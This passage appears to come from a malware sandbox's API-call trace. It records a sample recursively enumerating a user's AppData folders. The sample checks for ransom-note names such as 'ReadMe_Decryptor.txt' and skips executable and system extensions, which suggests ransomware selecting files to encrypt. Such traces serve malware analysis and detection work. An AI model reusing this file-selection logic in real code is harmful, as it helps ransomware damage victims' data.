lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.749] FindClose (in: hFindFile=0x72a960 | out: hFindFile=0x72a960) returned 1 [0081.749] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.749] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0081.749] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.749] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0081.749] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f5d6350, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x2f5d6350, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x2f5d6350, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMC", cAlternateFileName="")) returned 1 [0081.750] lstrcmpW (lpString1="MMC", lpString2=".") returned 1 [0081.750] lstrcmpW (lpString1="MMC", lpString2="..") returned 1 [0081.750] lstrlenW (lpString="MMC") returned 3 [0081.750] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="MMC" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC" [0081.750] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\" [0081.750] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\") returned 60 [0081.750] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0081.754] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.754] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f5d6350, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x2f5d6350, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x2f5d6350, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.756] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.756] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.756] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f5d6350, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x2f5d6350, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x2f5d6350, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.756] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0081.756] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x8d940a0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8d940a0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS Project", cAlternateFileName="MSPROJ~1")) returned 1 [0081.756] lstrcmpW (lpString1="MS Project", lpString2=".") returned 1 [0081.756] lstrcmpW (lpString1="MS Project", lpString2="..") returned 1 [0081.756] lstrlenW (lpString="MS Project") returned 10 [0081.756] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="MS Project" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project" [0081.757] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\" [0081.757] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\") returned 67 [0081.757] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0081.759] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.759] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x8d940a0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8d940a0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.761] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.761] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.761] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x8d940a0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8d940a0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="14", cAlternateFileName="")) returned 1 [0081.761] lstrcmpW (lpString1="14", lpString2=".") returned 1 [0081.761] lstrcmpW (lpString1="14", lpString2="..") returned 1 [0081.761] lstrlenW (lpString="14") returned 2 [0081.761] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpString2="14" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14" [0081.761] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\" [0081.761] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\") returned 70 [0081.762] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0081.764] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.764] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x8d940a0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8d940a0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.767] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.767] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.767] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x8e064c0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8e064c0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0081.767] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0081.767] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0081.768] lstrlenW (lpString="1033") returned 4 [0081.768] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpString2="1033" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033" [0081.768] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\" [0081.768] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned 75 [0081.768] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a960 [0081.769] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.769] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x8e064c0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8e064c0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.771] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.771] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.771] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8e064c0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x8e064c0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0xfee79d60, ftLastWriteTime.dwHighDateTime=0x1d3aab9, nFileSizeHigh=0x0, nFileSizeLow=0x5f600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Global.MPT", cAlternateFileName="")) returned 1 [0081.771] lstrcmpW (lpString1="Global.MPT", lpString2=".") returned 1 [0081.771] lstrcmpW (lpString1="Global.MPT", lpString2="..") returned 1 [0081.771] lstrcmpiW (lpString1="Global.MPT", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.771] lstrcmpiW (lpString1="Global.MPT", lpString2="Decryptor_Info.hta") returned 1 [0081.771] PathFindExtensionW (pszPath="Global.MPT") returned=".MPT" [0081.771] lstrcmpiW (lpString1=".MPT", lpString2=".exe") returned 1 [0081.771] lstrcmpiW (lpString1=".MPT", lpString2=".sys") returned -1 [0081.771] lstrcmpiW (lpString1=".MPT", lpString2=".lnk") returned 1 [0081.771] lstrcmpiW (lpString1=".MPT", lpString2=".dll") returned 1 [0081.771] lstrcmpiW (lpString1=".MPT", lpString2=".msi") returned -1 [0081.771] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77c988 [0081.771] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77ca30 [0081.771] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77c988 | out: hHeap=0x6d0000) returned 1 [0081.771] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9648 [0081.772] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77ca30 | out: hHeap=0x6d0000) returned 1 [0081.772] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8e064c0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x8e064c0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0xfee79d60, ftLastWriteTime.dwHighDateTime=0x1d3aab9, nFileSizeHigh=0x0, nFileSizeLow=0x5f600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Global.MPT", cAlternateFileName="")) returned 0 [0081.772] FindClose (in: hFindFile=0x72a960 | out: hFindFile=0x72a960) returned 1 [0081.772] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8e064c0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x8e064c0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0xfee79d60, ftLastWriteTime.dwHighDateTime=0x1d3aab9, nFileSizeHigh=0x0, nFileSizeLow=0x5f600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Global.MPT", cAlternateFileName="")) returned 0 [0081.772] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0081.772] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8e064c0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x8e064c0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0xfee79d60, ftLastWriteTime.dwHighDateTime=0x1d3aab9, nFileSizeHigh=0x0, nFileSizeLow=0x5f600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Global.MPT", cAlternateFileName="")) returned 0 [0081.772] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0081.772] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0081.772] lstrcmpW (lpString1="Network", lpString2=".") returned 1 [0081.772] lstrcmpW (lpString1="Network", lpString2="..") returned 1 [0081.773] lstrlenW (lpString="Network") returned 7 [0081.773] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Network" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network" [0081.773] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\" [0081.773] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\") returned 64 [0081.773] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0081.777] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.777] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.779] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.779] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.779] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0081.779] lstrcmpW (lpString1="Connections", lpString2=".") returned 1 [0081.779] lstrcmpW (lpString1="Connections", lpString2="..") returned 1 [0081.779] lstrlenW (lpString="Connections") returned 11 [0081.779] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpString2="Connections" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0081.779] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\" [0081.779] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned 76 [0081.779] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0081.780] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.780] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.783] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.783] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.783] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pbk", cAlternateFileName="")) returned 1 [0081.783] lstrcmpW (lpString1="Pbk", lpString2=".") returned 1 [0081.783] lstrcmpW (lpString1="Pbk", lpString2="..") returned 1 [0081.783] lstrlenW (lpString="Pbk") returned 3 [0081.783] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2="Pbk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0081.783] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\" [0081.783] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned 80 [0081.783] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a960 [0081.783] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.784] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.785] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.785] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.785] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 1 [0081.785] lstrcmpW (lpString1="_hiddenPbk", lpString2=".") returned 1 [0081.785] lstrcmpW (lpString1="_hiddenPbk", lpString2="..") returned 1 [0081.785] lstrlenW (lpString="_hiddenPbk") returned 10 [0081.785] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpString2="_hiddenPbk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0081.786] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\" [0081.786] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned 91 [0081.786] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0081.786] lstrcmpW (lpString1=".", 